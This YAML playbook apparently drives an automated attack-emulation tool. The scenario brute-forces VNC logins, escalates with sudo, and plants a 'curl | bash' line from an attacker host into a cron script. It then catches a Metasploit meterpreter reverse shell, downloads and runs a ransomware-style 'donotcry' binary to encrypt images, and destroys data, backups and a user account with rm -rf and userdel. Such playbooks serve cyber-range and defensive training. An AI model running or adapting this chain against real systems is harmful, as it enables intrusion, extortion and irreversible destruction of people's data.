####################
#
# Scenario 3 a b 
#
####################

vars:
  $SERVER_ADDRESS: 192.42.0.254
  $ATTACKER_ADDRESS: 192.42.1.174
  $DNS_SERVER: 192.42.0.233
  $LISTA:
  - "password1"
  - "password2"
  - "password3"
  - "password4"
  - "password5"
  - "123"
  - "12345"
  - "12345678"
 
commands:
  - type: loop
    break_if: $RESULT_STDOUT =~ vnc_connected
    cmd: "items(LISTA)"
    commands:
    - type: vnc
      creates_session: foothold
      username: john
      password: $LOOP_ITEM 
      hostname: $SERVER_ADDRESS
      port: "5901"
      cmd: move
      x: 5
      y: 5

  - type: vnc
    session: foothold
    cmd: click
  - type: sleep
    seconds: 3

  - type: vnc
    session: foothold
    cmd: type
    input: "terminal"

  - type: sleep
    seconds: 3

  - type: vnc
    session: foothold
    cmd: key
    key: "enter"

  - type: sleep
    seconds: 3

  - type: vnc
    session: foothold
    cmd: type
    input: "sudo -i"

  - type: sleep
    seconds: 3

  - type: vnc
    session: foothold
    cmd: key
    key: "enter"

  - type: sleep
    seconds: 2

  - type: vnc
    session: foothold
    cmd: type
    input: echo "curl http://$ATTACKER_ADDRESS:8888/install.sh | bash" >> /media/share/healthcheck_cron.sh

  - type: sleep
    seconds: 2

  - type: vnc
    session: foothold
    cmd: key
    key: "enter"

  - type: sleep
    seconds: 1

  - type: mktemp
    cmd: file
    variable: RSHELL

  - type: msf-payload
    cmd: cmd/unix/python/meterpreter/reverse_tcp
    payload_options:
      LHOST: $ATTACKER_ADDRESS
      LPORT: "4444"
    local_path: $RSHELL

  - type: msf-module
    creates_session: movement
    cmd: exploit/multi/handler
    payload: "cmd/unix/python/meterpreter/reverse_tcp"
    payload_options:
      LHOST: $ATTACKER_ADDRESS
      LPORT: "4444"
    background: true
    kill_on_exit: true

  - type: webserv
    local_path: $RSHELL
    port: 8888
    background: True
    kill_on_exit: true

  - type: vnc
    cmd: close
    session: foothold

#################### MOVED ############################################
  - type: msf-session
    session: movement
    cmd: sysinfo

  - type: msf-session
    session: movement
    cmd: getuid

  - type: msf-session
    session: movement
    cmd: shell

  # Prepare for upgradeshell
  - type: setvar
    cmd: movement
    variable: $UPGRADESESSION

  - type: include
    local_path: upgrade.yml

  - type: msf-session
    session: movement
    cmd: curl http://$ATTACKER_ADDRESS/donotcry > /opt/donotcry

  - type: msf-session
    session: movement
    cmd: /lib64/ld-linux-x86-64.so.2 /opt/donotcry encrypt /media/data/Images

  - type: msf-session
    session: movement
    cmd: find /media/data/Images

  - type: msf-session
    session: movement
    cmd: cat /etc/passwd
  
  - type: msf-session
    session: movement
    cmd: userdel -f john
  
  - type: msf-session
    session: movement
    cmd: rm -rf /media/data/*
  
  - type: msf-session
    session: movement
    cmd: rm -rf /var/backups/*
  
  - type: msf-session
    session: movement
    cmd: systemctl stop exim4.service

